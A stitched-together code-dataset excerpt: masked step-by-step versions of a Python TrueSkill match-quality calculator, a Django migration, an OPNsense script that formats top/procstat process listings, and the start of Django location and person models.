2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n <mask token>\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n\n def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,\n totalPlayers):\n playerAssignments = list()\n totalPreviousPlayers = 0\n for i in range(len(teamAssignmentsList)):\n currentTeam = teamAssignmentsList[i]\n currentRowValues = [0] * totalPreviousPlayers\n playerAssignments.append(currentRowValues)\n for currentRating in currentTeam:\n currentRowValues.append(getPartialPlayPercentage(\n currentRating[0]))\n totalPreviousPlayers += 1\n nextTeam = teamAssignmentsList[i + 1]\n for nextTeamPlayerPair in nextTeam:\n currentRowValues.append(-1 * getPartialPlayPercentage(\n nextTeamPlayerPair[0]))\n return Matrix(totalPlayers, len(teamAssignmentsList) - 1,\n playerAssignments)\n",
"step-3": "<mask token>\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n\n def calculateNewRatings(self, gameInfo, teams, teamRanks):\n argumentNotNone(gameInfo, 'gameInfo')\n self._validateTeamCountAndPlayersCountPerTeam(teams)\n teams, teamRanks = sortByRank(teams, teamRanks)\n factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)\n factorGraph.buildGraph()\n factorGraph.runSchedule()\n return factorGraph.getUpdatedRatings()\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n\n def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,\n totalPlayers):\n playerAssignments = list()\n totalPreviousPlayers = 0\n for i in range(len(teamAssignmentsList)):\n currentTeam = teamAssignmentsList[i]\n currentRowValues = [0] * totalPreviousPlayers\n playerAssignments.append(currentRowValues)\n for currentRating in currentTeam:\n currentRowValues.append(getPartialPlayPercentage(\n currentRating[0]))\n totalPreviousPlayers += 1\n nextTeam = teamAssignmentsList[i + 1]\n for nextTeamPlayerPair in nextTeam:\n currentRowValues.append(-1 * getPartialPlayPercentage(\n nextTeamPlayerPair[0]))\n return Matrix(totalPlayers, len(teamAssignmentsList) - 1,\n playerAssignments)\n",
"step-4": "from layers import TrueSkillFactorGraph\nfrom math import e, sqrt\nfrom numerics import atLeast, _Vector, _DiagonalMatrix, Matrix\nfrom objects import SkillCalculator, SupportedOptions, argumentNotNone, getPartialPlayPercentage, sortByRank\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n\n def calculateNewRatings(self, gameInfo, teams, teamRanks):\n argumentNotNone(gameInfo, 'gameInfo')\n self._validateTeamCountAndPlayersCountPerTeam(teams)\n teams, teamRanks = sortByRank(teams, teamRanks)\n factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)\n factorGraph.buildGraph()\n factorGraph.runSchedule()\n return factorGraph.getUpdatedRatings()\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n\n def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,\n totalPlayers):\n playerAssignments = list()\n totalPreviousPlayers = 0\n for i in range(len(teamAssignmentsList)):\n currentTeam = teamAssignmentsList[i]\n currentRowValues = [0] * totalPreviousPlayers\n playerAssignments.append(currentRowValues)\n for currentRating in currentTeam:\n currentRowValues.append(getPartialPlayPercentage(\n currentRating[0]))\n totalPreviousPlayers += 1\n nextTeam = teamAssignmentsList[i + 1]\n for nextTeamPlayerPair in nextTeam:\n currentRowValues.append(-1 * getPartialPlayPercentage(\n nextTeamPlayerPair[0]))\n return Matrix(totalPlayers, len(teamAssignmentsList) - 1,\n playerAssignments)\n",
"step-5": "from layers import TrueSkillFactorGraph\nfrom math import e, sqrt\nfrom numerics import atLeast, _Vector, _DiagonalMatrix, Matrix\nfrom objects import SkillCalculator, SupportedOptions, argumentNotNone, \\\n\tgetPartialPlayPercentage, sortByRank\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\tdef __init__(self):\n\t\tsuper(FactorGraphTrueSkillCalculator, self).__init__(SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE, atLeast(2), atLeast(1))\n\t\n\tdef calculateNewRatings(self, gameInfo, teams, teamRanks):\n\t\targumentNotNone(gameInfo, \"gameInfo\")\n\t\tself._validateTeamCountAndPlayersCountPerTeam(teams)\n\t\tteams, teamRanks = sortByRank(teams, teamRanks)\n\t\t\n\t\tfactorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)\n\t\tfactorGraph.buildGraph()\n\t\tfactorGraph.runSchedule()\t\n\t\t\n\t\treturn factorGraph.getUpdatedRatings()\n\t\t\n\tdef calculateMatchQuality(self, gameInfo, teams):\n\t\tskillsMatrix = self._getPlayerCovarianceMatrix(teams)\n\t\tmeanVector = self._getPlayerMeansVector(teams)\n\t\tmeanVectorTranspose = meanVector.transpose\n\t\t\n\t\tplayerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(teams, meanVector.rows)\n\t\tplayerTeamAssignmentsMatrixTranspose = playerTeamAssignmentsMatrix.transpose\n\t\t\n\t\tbetaSquared = gameInfo.beta**2.0\n\t\t\n\t\tstart = meanVectorTranspose * playerTeamAssignmentsMatrix\n\t\taTa = (betaSquared * playerTeamAssignmentsMatrixTranspose) * playerTeamAssignmentsMatrix\n\t\taTSA = playerTeamAssignmentsMatrixTranspose * skillsMatrix * playerTeamAssignmentsMatrix\n\t\tmiddle = aTa + aTSA\n\t\t\n\t\tmiddleInverse = middle.inverse\n\t\t\n\t\tend = playerTeamAssignmentsMatrixTranspose * meanVector\n\t\t\n\t\texpPartMatrix = (start * middleInverse * end) * -0.5\n\t\texpPart = expPartMatrix.determinant\n\t\t\n\t\tsqrtPartNumerator = aTa.determinant\n\t\tsqrtPartDenominator = middle.determinant\n\t\tsqrtPart = sqrtPartNumerator / sqrtPartDenominator\n\t\t\n\t\tresult = (e**expPart) * sqrt(sqrtPart)\n\t\t\n\t\treturn result\n\t\t\n\tdef _getPlayerMeansVector(self, teamAssignmentsList):\n\t\treturn _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.mean))\n\t\t\n\tdef _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n\t\treturn _DiagonalMatrix(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.standardDeviation**2.0))\n\t\t\n\tdef _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n\t\tplayerRatingValues = list()\n\t\tfor currentTeam in teamAssigmentsList:\n\t\t\tfor currentRating in currentTeam.values:\n\t\t\t\tplayerRatingValues.append(playerRatingFunction(currentRating))\n\t\treturn playerRatingValues\n\t\n\tdef _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList, totalPlayers):\n\t\tplayerAssignments = list()\n\t\ttotalPreviousPlayers = 0\n\t\t\n\t\tfor i in range(len(teamAssignmentsList)):\n\t\t\tcurrentTeam = teamAssignmentsList[i]\n\t\t\tcurrentRowValues = [0] * totalPreviousPlayers\n\t\t\tplayerAssignments.append(currentRowValues)\n\t\t\t\n\t\t\tfor currentRating in currentTeam:\n\t\t\t\tcurrentRowValues.append(getPartialPlayPercentage(currentRating[0]))\n\t\t\t\ttotalPreviousPlayers += 1\n\t\t\t\t\n\t\t\tnextTeam = teamAssignmentsList[i + 1]\n\t\t\tfor nextTeamPlayerPair in nextTeam:\n\t\t\t\tcurrentRowValues.append(-1 * getPartialPlayPercentage(nextTeamPlayerPair[0]))\n\t\t\t\t\n\t\treturn Matrix(totalPlayers, len(teamAssignmentsList) - 1, playerAssignments)\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('talk', '0023_auto_20180207_1121')]
operations = [migrations.AddField(model_name='talkmedia', name=
'codelink', field=models.CharField(blank=True, max_length=255,
verbose_name='Source code'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('talk', '0023_auto_20180207_1121')]
operations = [migrations.AddField(model_name='talkmedia', name=
'codelink', field=models.CharField(blank=True, max_length=255,
verbose_name='Source code'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2018-04-27 08:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('talk', '0023_auto_20180207_1121'),
]
operations = [
migrations.AddField(
model_name='talkmedia',
name='codelink',
field=models.CharField(blank=True, max_length=255, verbose_name='Source code'),
),
]
|
flexible
|
{
"blob_id": "f85a703b47d981397ed6048e941030a3fbee7b6d",
"index": 229,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('talk', '0023_auto_20180207_1121')]\n operations = [migrations.AddField(model_name='talkmedia', name=\n 'codelink', field=models.CharField(blank=True, max_length=255,\n verbose_name='Source code'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('talk', '0023_auto_20180207_1121')]\n operations = [migrations.AddField(model_name='talkmedia', name=\n 'codelink', field=models.CharField(blank=True, max_length=255,\n verbose_name='Source code'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.8 on 2018-04-27 08:05\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('talk', '0023_auto_20180207_1121'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='talkmedia',\n name='codelink',\n field=models.CharField(blank=True, max_length=255, verbose_name='Source code'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
fieldnames = None
field_max_width = dict()
result = {'headers': [], 'details': []}
is_header = True
tidpid = dict()
for line in subprocess.run(['/usr/bin/procstat', '-ath'],
capture_output=True, text=True).stdout.split('\n'):
parts = line.split(maxsplit=2)
if len(parts) > 1:
tidpid[parts[1]] = parts[0]
sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],
capture_output=True, text=True)
topData = sp.stdout.strip().split('\n\n', 2)[-1]
for line in topData.split('\n'):
if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
is_header = False
if is_header:
if len(line.strip()) > 0:
result['headers'].append(line)
elif fieldnames is None:
fieldnames = ['PID'] + line.split()
else:
tmp = line.split(maxsplit=10)
record = {'C': '0'}
for field_id in range(len(fieldnames)):
fieldname = fieldnames[field_id]
if field_id == 0:
record[fieldname] = tidpid[tmp[0]] if tmp[0
] in tidpid else ''
else:
record[fieldname] = tmp[field_id - 1]
if fieldname not in field_max_width or field_max_width[
fieldname] < len(record[fieldname]):
field_max_width[fieldname] = len(record[fieldname])
result['details'].append(record)
if len(sys.argv) > 1 and sys.argv[1] == 'json':
print(ujson.dumps(result))
else:
for header_line in result['headers']:
print(header_line)
print('\n')
if fieldnames is not None:
format_str = ''
header_fields = {}
for fieldname in fieldnames:
format_str = '%s %%(%s)-%ds' % (format_str, fieldname,
field_max_width[fieldname] + 1)
header_fields[fieldname] = fieldname
print(format_str % header_fields)
for detail_line in result['details']:
print(format_str % detail_line)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import collections
import tempfile
import subprocess
import os
import sys
import ujson
if __name__ == '__main__':
fieldnames = None
field_max_width = dict()
result = {'headers': [], 'details': []}
is_header = True
tidpid = dict()
for line in subprocess.run(['/usr/bin/procstat', '-ath'],
capture_output=True, text=True).stdout.split('\n'):
parts = line.split(maxsplit=2)
if len(parts) > 1:
tidpid[parts[1]] = parts[0]
sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],
capture_output=True, text=True)
topData = sp.stdout.strip().split('\n\n', 2)[-1]
for line in topData.split('\n'):
if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
is_header = False
if is_header:
if len(line.strip()) > 0:
result['headers'].append(line)
elif fieldnames is None:
fieldnames = ['PID'] + line.split()
else:
tmp = line.split(maxsplit=10)
record = {'C': '0'}
for field_id in range(len(fieldnames)):
fieldname = fieldnames[field_id]
if field_id == 0:
record[fieldname] = tidpid[tmp[0]] if tmp[0
] in tidpid else ''
else:
record[fieldname] = tmp[field_id - 1]
if fieldname not in field_max_width or field_max_width[
fieldname] < len(record[fieldname]):
field_max_width[fieldname] = len(record[fieldname])
result['details'].append(record)
if len(sys.argv) > 1 and sys.argv[1] == 'json':
print(ujson.dumps(result))
else:
for header_line in result['headers']:
print(header_line)
print('\n')
if fieldnames is not None:
format_str = ''
header_fields = {}
for fieldname in fieldnames:
format_str = '%s %%(%s)-%ds' % (format_str, fieldname,
field_max_width[fieldname] + 1)
header_fields[fieldname] = fieldname
print(format_str % header_fields)
for detail_line in result['details']:
print(format_str % detail_line)
<|reserved_special_token_1|>
#!/usr/local/bin/python3
"""
Copyright (c) 2015-2019 Ad Schellevis <ad@opnsense.org>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
returns system activity (top)
"""
import collections
import tempfile
import subprocess
import os
import sys
import ujson
if __name__ == '__main__':
fieldnames = None
field_max_width = dict()
result = {'headers': [], 'details': []}
is_header = True
tidpid = dict()
for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\n'):
parts = line.split(maxsplit=2)
if len(parts) > 1:
tidpid[parts[1]] = parts[0]
# grab second display so that CPU time data appears
sp = subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)
topData = sp.stdout.strip().split('\n\n',2)[-1]
for line in topData.split('\n'):
# end of header, start of top detection
if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
is_header = False
if is_header:
# parse headers from top command, add to result
if len(line.strip()) > 0:
result['headers'].append(line)
else:
# parse details including fieldnames (leave original)
if fieldnames is None:
fieldnames = ['PID'] + line.split()
else:
tmp = line.split(maxsplit=10)
record = {'C': '0'}
for field_id in range(len(fieldnames)):
fieldname = fieldnames[field_id]
if field_id == 0: # PID
record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''
else:
record[fieldname] = tmp[field_id - 1]
if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):
field_max_width[fieldname] = len(record[fieldname])
result['details'].append(record)
if len(sys.argv) > 1 and sys.argv[1] == 'json':
# output as json
print(ujson.dumps(result))
else:
# output plain (reconstruct data)
for header_line in result['headers']:
print (header_line)
print ("\n")
if fieldnames is not None:
format_str = ""
header_fields = {}
for fieldname in fieldnames:
format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)
header_fields[fieldname] = fieldname
print (format_str % header_fields)
for detail_line in result['details']:
print (format_str % detail_line)
|
flexible
|
{
"blob_id": "f4ae34be2be2b47b3394e6da751c53c51a1c3174",
"index": 6678,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-3": "<mask token>\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n if fieldname not in field_max_width or field_max_width[\n fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n print(ujson.dumps(result))\n else:\n for header_line in result['headers']:\n print(header_line)\n print('\\n')\n if fieldnames is not None:\n format_str = ''\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds' % (format_str, fieldname, \n field_max_width[fieldname] + 1)\n header_fields[fieldname] = fieldname\n print(format_str % header_fields)\n for detail_line in result['details']:\n print(format_str % detail_line)\n",
"step-4": "#!/usr/local/bin/python3\n\n\"\"\"\n Copyright (c) 2015-2019 Ad Schellevis <ad@opnsense.org>\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\n --------------------------------------------------------------------------------------\n returns system activity (top)\n\"\"\"\nimport collections\nimport tempfile\nimport subprocess\nimport os\nimport sys\nimport ujson\n\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n # grab second display so that CPU time data appears\n sp = subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n',2)[-1]\n for line in topData.split('\\n'):\n # end of header, start of top detection\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n # parse headers from top command, add to result\n if len(line.strip()) > 0:\n result['headers'].append(line)\n else:\n # parse details including fieldnames (leave original)\n if fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0: # PID\n record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''\n else:\n record[fieldname] = tmp[field_id - 1]\n\n if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):\n field_max_width[fieldname] = len(record[fieldname])\n result['details'].append(record)\n\n if len(sys.argv) > 1 and sys.argv[1] == 'json':\n # output as json\n print(ujson.dumps(result))\n else:\n # output plain (reconstruct data)\n for header_line in result['headers']:\n print (header_line)\n print (\"\\n\")\n if fieldnames is not None:\n format_str = \"\"\n header_fields = {}\n for fieldname in fieldnames:\n format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)\n header_fields[fieldname] = fieldname\n\n print (format_str % header_fields)\n for detail_line in result['details']:\n print (format_str % detail_line)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.db import models
class Location(models.Model):
id_location = models.AutoField(primary_key=True)
city = models.CharField(max_length=100, null=True)
street_name = models.CharField(max_length=100, null=True)
street_number = models.IntegerField(null=True)
zip = models.IntegerField(null=True)
country = models.CharField(max_length=100, null=True)
name = models.CharField(max_length=100, null=True)
latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
def __str__(self):
# print('Name', type(self.name), '\nCountry', type(self.country), '\nCity', self.city)
return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)
class Person(models.Model):
id_person = models.AutoField(primary_key=True)
nickname = models.CharField(max_length=100, null=True)
first_name = models.CharField(max_length=100, null=True)
last_name = models.CharField(max_length=100, null=True)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)
birth_day = models.DateField(default='1900-01-01')
height = models.IntegerField(null=True)
GENDER = (
('Female', 'Female'),
